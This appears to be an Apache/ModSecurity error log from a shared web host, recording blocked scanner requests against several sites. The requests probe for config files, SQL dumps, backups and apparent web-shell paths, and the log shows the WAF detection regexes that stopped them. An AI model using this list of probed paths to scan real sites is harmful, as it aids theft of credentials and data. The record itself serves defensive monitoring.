[Tue May 26 14:22:52.119586 2026] [security2:error] [pid 606909:tid 607126] [client 20.45.47.31:45230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config/settings.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcYAAAANw"], referer: https://www.google.com/search?q=
[Tue May 26 14:22:52.120191 2026] [security2:error] [pid 606909:tid 607106] [client 20.45.47.31:45360] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/inc/database.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcaAAAAMg"], referer: https://www.google.com/search?q=
[Tue May 26 14:22:52.120197 2026] [security2:error] [pid 606909:tid 607100] [client 20.45.47.31:45246] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config/mail.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcZQAAAMI"], referer: https://duckduckgo.com/
[Tue May 26 14:22:52.120281 2026] [security2:error] [pid 606909:tid 607082] [client 20.45.47.31:45410] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/system/config.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcZgAAALA"], referer: https://duckduckgo.com/
[Tue May 26 14:22:52.122090 2026] [security2:error] [pid 606909:tid 607165] [client 20.45.47.31:45472] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/app/config/database.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcbwAAAQM"], referer: https://duckduckgo.com/
[Tue May 26 14:22:52.122093 2026] [security2:error] [pid 606909:tid 607091] [client 20.45.47.31:45340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/inc/config.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcbgAAALk"]
[Tue May 26 14:22:52.122206 2026] [security2:error] [pid 606909:tid 607064] [client 20.45.47.31:45338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/includes/db.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcagAAAJ4"]
[Tue May 26 14:22:52.124668 2026] [security2:error] [pid 606909:tid 607076] [client 20.226.60.108:14406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/config.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcPAAAAKo"]
[Tue May 26 14:22:52.124929 2026] [security2:error] [pid 606909:tid 607127] [client 20.45.47.31:45116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/mail.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcUwAAAN0"], referer: https://www.google.com/
[Tue May 26 14:22:52.125104 2026] [security2:error] [pid 606909:tid 607076] [client 20.226.60.108:14406] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/config.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcPAAAAKo"]
[Tue May 26 14:22:52.134007 2026] [http2:info] [pid 610693:tid 610693] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 14:22:52.134964 2026] [security2:error] [pid 606909:tid 607153] [client 20.45.47.31:45888] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/site.bak"] [unique_id "ahVfZF0yRtX9qA7aVUVcfAAAAPc"], referer: https://www.bing.com/search
[Tue May 26 14:22:52.135138 2026] [security2:error] [pid 606909:tid 607090] [client 20.45.47.31:45896] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/backup.old"] [unique_id "ahVfZF0yRtX9qA7aVUVceQAAALg"], referer: https://www.bing.com/search
[Tue May 26 14:22:52.135854 2026] [security2:error] [pid 606909:tid 607155] [client 20.45.47.31:45682] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/database.sql"] [unique_id "ahVfZF0yRtX9qA7aVUVcfQAAAPk"], referer: https://www.google.com/
[Tue May 26 14:22:52.140926 2026] [security2:error] [pid 606909:tid 607143] [client 20.45.47.31:45708] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/dump.sql"] [unique_id "ahVfZF0yRtX9qA7aVUVcYgAAAO0"]
[Tue May 26 14:22:52.148432 2026] [security2:error] [pid 606909:tid 607154] [client 20.45.47.31:45692] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/db_backup.sql"] [unique_id "ahVfZF0yRtX9qA7aVUVcggAAAPg"]
[Tue May 26 14:22:52.181980 2026] [security2:error] [pid 606909:tid 607068] [client 20.45.47.31:45922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/mysql.sql"] [unique_id "ahVfZF0yRtX9qA7aVUVcigAAAKI"], referer: https://duckduckgo.com/
[Tue May 26 14:22:52.185231 2026] [security2:error] [pid 606909:tid 607071] [client 20.45.47.31:45782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/full_backup.sql"] [unique_id "ahVfZF0yRtX9qA7aVUVcjAAAAKU"]
[Tue May 26 14:22:52.185810 2026] [security2:error] [pid 606909:tid 607166] [client 20.45.47.31:45760] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/database_backup.sql"] [unique_id "ahVfZF0yRtX9qA7aVUVciwAAAQQ"], referer: https://www.google.com/
[Tue May 26 14:22:52.231391 2026] [security2:error] [pid 606909:tid 607041] [client 20.45.47.31:45954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/export.sql"] [unique_id "ahVfZF0yRtX9qA7aVUVckQAAAIc"]
[Tue May 26 14:22:52.231683 2026] [security2:error] [pid 606909:tid 607077] [client 20.45.47.31:45786] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "208.91.199.245"] [uri "/site_backup.zip"] [unique_id "ahVfZF0yRtX9qA7aVUVckgAAAKs"], referer: https://www.bing.com/search
[Tue May 26 14:22:52.232696 2026] [security2:error] [pid 606909:tid 607148] [client 20.45.47.31:45938] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/data.sql"] [unique_id "ahVfZF0yRtX9qA7aVUVckAAAAPI"]
[Tue May 26 14:22:52.234151 2026] [security2:error] [pid 606909:tid 607067] [client 20.45.47.31:45772] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/db_dump.sql"] [unique_id "ahVfZF0yRtX9qA7aVUVclQAAAKE"]
[Tue May 26 14:22:52.234392 2026] [security2:error] [pid 606909:tid 607105] [client 20.45.47.31:45906] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/config.old"] [unique_id "ahVfZF0yRtX9qA7aVUVclgAAAMc"], referer: https://www.bing.com/search
[Tue May 26 14:22:52.238225 2026] [security2:error] [pid 606909:tid 607086] [client 20.45.47.31:45856] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/backup.bak"] [unique_id "ahVfZF0yRtX9qA7aVUVcmAAAALQ"], referer: https://www.google.com/search?q=
[Tue May 26 14:22:52.241034 2026] [security2:error] [pid 606909:tid 607103] [client 20.45.47.31:45872] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/config.bak"] [unique_id "ahVfZF0yRtX9qA7aVUVcnQAAAMU"], referer: https://www.google.com/
[Tue May 26 14:22:52.241292 2026] [security2:error] [pid 606909:tid 607144] [client 20.45.47.31:45900] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/database.old"] [unique_id "ahVfZF0yRtX9qA7aVUVcngAAAO4"]
[Tue May 26 14:22:52.243188 2026] [security2:error] [pid 606909:tid 607145] [client 20.45.47.31:45858] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/database.bak"] [unique_id "ahVfZF0yRtX9qA7aVUVcnwAAAO8"], referer: https://www.google.com/
[Tue May 26 14:22:52.275952 2026] [security2:error] [pid 606909:tid 607116] [client 20.45.47.31:45930] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/mysqldump.sql"] [unique_id "ahVfZF0yRtX9qA7aVUVcoQAAANI"], referer: https://www.google.com/
[Tue May 26 14:22:52.278063 2026] [security2:error] [pid 606909:tid 607078] [client 20.45.47.31:45956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/db.sql"] [unique_id "ahVfZF0yRtX9qA7aVUVcogAAAKw"]
[Tue May 26 14:22:52.278579 2026] [security2:error] [pid 610693:tid 610949] [client 20.45.47.31:46028] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/credentials.php"] [unique_id "ahVfZDvNO3hpmlY6M8RSyQAAAH4"], referer: https://search.yahoo.com/
[Tue May 26 14:22:52.282108 2026] [security2:error] [pid 610693:tid 610950] [client 20.45.47.31:45984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/secrets.php"] [unique_id "ahVfZDvNO3hpmlY6M8RSywAAAH8"]
[Tue May 26 14:22:52.481988 2026] [security2:error] [pid 606909:tid 607072] [client 20.226.60.108:22364] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/num.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcqQAAAKY"]
[Tue May 26 14:22:52.482119 2026] [security2:error] [pid 606909:tid 607072] [client 20.226.60.108:22364] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/num.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcqQAAAKY"]
[Tue May 26 14:22:52.564036 2026] [security2:error] [pid 606909:tid 607157] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfZF0yRtX9qA7aVUVciAAAAPs"]
[Tue May 26 14:22:52.709430 2026] [security2:error] [pid 606909:tid 606937] [remote 213.171.208.232:32992] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcrQAAlRs"]
[Tue May 26 14:22:52.836078 2026] [security2:error] [pid 610693:tid 610857] [client 20.226.60.108:39123] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/areak1.php"] [unique_id "ahVfZDvNO3hpmlY6M8RS1AAAACI"]
[Tue May 26 14:22:52.836187 2026] [security2:error] [pid 610693:tid 610857] [client 20.226.60.108:39123] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/areak1.php"] [unique_id "ahVfZDvNO3hpmlY6M8RS1AAAACI"]
[Tue May 26 14:22:53.202231 2026] [security2:error] [pid 606909:tid 607140] [client 20.226.60.108:39113] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/vc.php"] [unique_id "ahVfZV0yRtX9qA7aVUVctwAAAOo"]
[Tue May 26 14:22:53.202331 2026] [security2:error] [pid 606909:tid 607140] [client 20.226.60.108:39113] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/vc.php"] [unique_id "ahVfZV0yRtX9qA7aVUVctwAAAOo"]
[Tue May 26 14:22:53.566032 2026] [security2:error] [pid 610693:tid 610875] [client 20.226.60.108:42357] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-content/plugins/admin.php"] [unique_id "ahVfZTvNO3hpmlY6M8RS2wAAADQ"]
[Tue May 26 14:22:53.566152 2026] [security2:error] [pid 610693:tid 610875] [client 20.226.60.108:42357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-content/plugins/admin.php"] [unique_id "ahVfZTvNO3hpmlY6M8RS2wAAADQ"]
[Tue May 26 14:22:53.920938 2026] [security2:error] [pid 610693:tid 610866] [client 20.226.60.108:39116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/core.php"] [unique_id "ahVfZTvNO3hpmlY6M8RS5gAAACs"]
[Tue May 26 14:22:53.921070 2026] [security2:error] [pid 610693:tid 610866] [client 20.226.60.108:39116] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/core.php"] [unique_id "ahVfZTvNO3hpmlY6M8RS5gAAACs"]
[Tue May 26 14:22:54.355004 2026] [autoindex:error] [pid 606909:tid 607044] [client 20.226.60.108:49171] AH01276: Cannot serve directory /home2/huron6a0/public_html/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:22:54.356064 2026] [security2:error] [pid 606909:tid 607044] [client 20.226.60.108:49171] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "huronwoodphysio.com"] [uri "/cgi-sys/403.html"] [unique_id "ahVfZl0yRtX9qA7aVUVcxQAAAIo"]
[Tue May 26 14:22:54.603873 2026] [autoindex:error] [pid 606909:tid 607089] [client 20.226.60.108:49171] AH01276: Cannot serve directory /home2/huron6a0/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:22:54.604586 2026] [security2:error] [pid 606909:tid 607089] [client 20.226.60.108:49171] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "huronwoodphysio.com"] [uri "/cgi-sys/403.html"] [unique_id "ahVfZl0yRtX9qA7aVUVcxwAAALc"]
[Tue May 26 14:22:54.786457 2026] [security2:error] [pid 606909:tid 607042] [client 20.226.60.108:49171] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-content/min.php"] [unique_id "ahVfZl0yRtX9qA7aVUVczAAAAIg"]
[Tue May 26 14:22:54.786589 2026] [security2:error] [pid 606909:tid 607042] [client 20.226.60.108:49171] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-content/min.php"] [unique_id "ahVfZl0yRtX9qA7aVUVczAAAAIg"]
[Tue May 26 14:22:54.937275 2026] [security2:error] [pid 610693:tid 610919] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfZjvNO3hpmlY6M8RS6wAAAGA"]
[Tue May 26 14:22:55.155526 2026] [security2:error] [pid 606909:tid 607097] [client 20.226.60.108:14487] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-content/plugins/beteng88/ws83.php"] [unique_id "ahVfZ10yRtX9qA7aVUVc0QAAAL8"]
[Tue May 26 14:22:55.155658 2026] [security2:error] [pid 606909:tid 607097] [client 20.226.60.108:14487] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-content/plugins/beteng88/ws83.php"] [unique_id "ahVfZ10yRtX9qA7aVUVc0QAAAL8"]
[Tue May 26 14:22:55.520029 2026] [security2:error] [pid 610693:tid 610895] [client 20.226.60.108:39854] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/ws37.php"] [unique_id "ahVfZzvNO3hpmlY6M8RS9AAAAEg"]
[Tue May 26 14:22:55.520183 2026] [security2:error] [pid 610693:tid 610895] [client 20.226.60.108:39854] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/ws37.php"] [unique_id "ahVfZzvNO3hpmlY6M8RS9AAAAEg"]
[Tue May 26 14:22:55.893940 2026] [security2:error] [pid 610693:tid 610945] [client 20.226.60.108:14513] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/new.php"] [unique_id "ahVfZzvNO3hpmlY6M8RS-QAAAHo"]
[Tue May 26 14:22:55.894055 2026] [security2:error] [pid 610693:tid 610945] [client 20.226.60.108:14513] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/new.php"] [unique_id "ahVfZzvNO3hpmlY6M8RS-QAAAHo"]
